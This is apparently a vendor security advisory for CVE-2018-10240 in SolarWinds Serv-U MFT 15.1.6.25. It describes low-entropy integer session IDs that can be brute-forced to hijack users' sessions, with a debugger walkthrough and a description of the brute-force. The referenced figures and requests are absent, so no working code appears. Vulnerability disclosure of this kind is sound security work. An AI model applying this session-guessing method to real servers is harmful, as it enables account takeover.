Title:

SolarWinds Serv-U Managed File Transfer – Insufficient Session ID Entropy

Release Date:

May 3, 2018

Reported Date:

January 8, 2018

Vendor:

SolarWinds

Version Affected:

Serv-U 15.1.6.25

Summary:

SolarWinds Serv-U MFT 15.1.6.25 assigns authenticated users a low-entropy session token that can be included in requests to the application as a URL parameter in lieu of a session cookie. This session token’s value can be brute-forced by an attacker to obtain the corresponding session cookie and hijack the user’s session.

Vendor Status:

The vendor has been notified of this vulnerability, and has patched the software as of version 15.1.6 HFv1.

Exploit Availability:

The Serv-U MFT server ordinarily assigns a 128-byte session cookie upon successful authentication, as shown below:

After a user successfully logs in, the application loads ListDir.htm, which displays the user’s home directory. The JavaScript in this page contains Serv-U application URLs that include a Session, as shown below:

This session value is an integer, and is accepted in lieu of a session cookie by the Serv-U application, as shown below:

Request:

Response:

The research team entered this cookie into a request to a local installation of Serv-U running in a debugger. This was performed to discover the correlating shortened integer form of the session value:

Using the 32-bit version of Serv-U in Windbg, the team set a breakpoint for the instruction at 1011ABFA, which correlated to the end of the deobfuscation function used to convert the 128-byte hexadecimal session value into the corresponding integer value. The address of the resulting integer session ID was stored in eax, and its contents are as follows:

This value, disclosed to an unauthenticated user, provided an index from which an attacker might begin incrementing or decrementing vales to discover a valid session ID.

To demonstrate how this vulnerability could be exploited, the research team created a new user session by logging into the application once again, and then used the value obtained in Figure 7 as a starting point for guessing the newly authenticated user’s session ID. This session ID was discovered after incrementing the index value 4,780 times:

Image from the Bishop Fox SolarWinds advisory describing an insufficient session ID entropy vulnerability.

Successful brute-forcing of Serv-U MFT session ID

The server’s response to this successful request included the below corresponding cookie value:

Researcher:

Baker Hamilton, MD, MMSc of Bishop Fox

For Reference:

CVE-2018-10240

National Vulnerability Database Write-Up